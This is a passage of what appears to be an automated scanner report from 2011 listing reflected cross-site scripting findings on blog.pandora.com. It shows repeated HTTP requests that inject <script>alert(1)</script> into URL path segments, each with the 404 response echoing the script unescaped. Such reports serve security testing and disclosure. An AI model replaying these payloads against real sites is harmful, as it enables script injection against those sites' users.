GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p> ...[SNIP]...
